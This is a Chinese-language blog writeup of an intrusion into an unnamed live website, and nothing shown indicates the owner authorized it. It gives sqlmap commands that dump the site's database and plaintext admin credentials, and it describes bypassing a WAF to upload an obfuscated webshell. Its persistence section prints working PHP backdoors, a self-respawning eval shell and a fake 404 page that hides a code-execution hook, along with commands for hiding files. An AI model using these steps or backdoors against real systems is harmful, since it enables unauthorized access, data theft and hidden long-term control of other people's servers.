【webshell】某站一次简单的渗透writeup

前言


切记勿要违法犯罪

提要

已拿webshell,权限过低,自身技能储备不足,没有能力绕过提权, 先暂时放着,后面学习了再拿权限。

信息搜集

可以利用网络上强大的搜索引擎,或者Google hacking进行关键字搜索特定目标站点,这个以后单独开一篇。

找到目标站点

获取IP地址,nmap扫描端口

获取目标站点横幅

加载字典获取目标站点目录

获取到phpinfo信息

获取到web后台

获取到upload路径

发现注入点,进行手工测试

SQLmap测试

存在注入点,但是不要慌,看看能不能绕过

绕过成功!

外网入口利用

外网入口利用的办法有很多,这里我只阐述数据库注入,目标站点还有XSS漏洞getwebshell,不再阐述。

在本次渗透中,利用数据库注入点漏洞进行获取数据库有效信息,进而getwebshell

查询当前数据库

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --current-db

查询当前数据库用户

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --current-user

查询是否当前数据库是管理员用户

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --is-dba

查询数据库用户角色

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --roles


权限太低

查询所有数据库

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --dbs

爆表

# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX --tables

爆字段

# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX -T --columns

爆数据

# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX -T -C  XXX  --dump


运气不错,密码没有md5加密,现在已经可以登录网站后台。

登录后台

发现fckeditor编辑器文件上传漏洞

查询编辑器版本

尝试文件上传

被拦截,谷歌了一下,imunify360 云waf,国外一个比较大型的安全厂商,我利用bp抓包,截断,文件包含,中间件解析,PHP CGI解析均被拦截,那么这个编辑器漏洞可能无法利用了。

发现意外上传点

在后台product栏目有个文件上传漏洞,这是原站上传pdf文件资料下载点,尝试base64加密传一句话利用蚁剑流量混淆加密传输成功绕过。

连接蚁剑


连接成功!

终端测试


权限太低了,除root账户外,几乎都没有任何账户能够登陆ssh和执行shell命令。

意外之喜


发现大佬已经光顾过这个站点,还留下了后门和大马,尝试bp爆破。

权限提升与维持

提权

自己暂时无法提权,经验不够(其实可以利用Linux内核进行提权,但是以往的内核提权服务器容易崩溃,所以没有尝试,以后有时间再来研究)

权限维持

在getshell后,往往因为内网渗透的需要不得不长时间对目标进行持续威胁(简称APT),因此需要进行权限维持,隐藏后门。

隐藏文件

attrib +s +h xxx.php  //隐藏xxx.php文件

attrib命令 用于修改文件属性
+s 设置系统文件属性
+h 设置隐藏属性

在文件夹下无法看到xxx.php,但仍然可以访问

不死马

<?php
set_time_limit(0);//程序执行时间
ignore_user_abort(1);//关掉终端后脚本仍然运行
unlink(__FILE__);//文件完整名
while(1){
file_put_contents('xxx.php','<?php $a=array($_REQUEST["xxx"]=>"3");
$b=array_keys($a)[0];
eval($b);?>');
sleep(5);
}
?>

该脚本每5秒向服务器创建xxx.php,并写入一句话免杀木马,结合attrib命令隐藏文件更好地建立后门。

404页面隐藏后门

<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
function func(){
    return @$_REQUEST["xxx"];
}
preg_replace("/xxx/e",func(),"i am xxx");
header('HTTP/1.1 404 Not Found');
?>

因为目标站点为Linux服务器,所以只列出了几个,windows的权限维持还可以利用.user.ini文件构成的PHP后门、建立影子账户、metasploit权限维持、shift后门、远程桌面会话劫持等方法,以后遇到了再说

内网渗透(暂停更新)

现在没时间,过段时间再更,写篇writeup太费时间了。。。
内网渗透可就好玩了,哈哈
等有时间再写进去。。。

Typecho赞赏功能

「一键投喂 软糖/蛋糕/布丁/牛奶/冰阔乐!」

冷夜清风

(๑>ڡ<)☆谢谢老板们的投食~

使用微信扫描二维码完成支付


  Previous post ヨスガノソラ
Next post   已到最新一篇

仅有一条评论

  1. x计划 x计划
    很细,思路清晰

添加新评论

选择表情

  TimeLine

熬夜使我兴奋!
--- updated on 2020-06-16 04:41:24 星期三

  About Me

九零后,集美貌与才华于一身。
专业提供各种网络技术支持,欢迎叨扰。
工作方向:渗透测试,IT运维。

  Recent Comments

生活其实很简单,过了今天就是明天。

低头哭过别忘了抬头继续走。

不要被任何人打乱自的脚步,因为没有谁会像你一样清楚和在乎自己梦想。

没有人可以打倒我,除非我自己先趴下!

你要记住你不是为别人而活,你是为自己而活。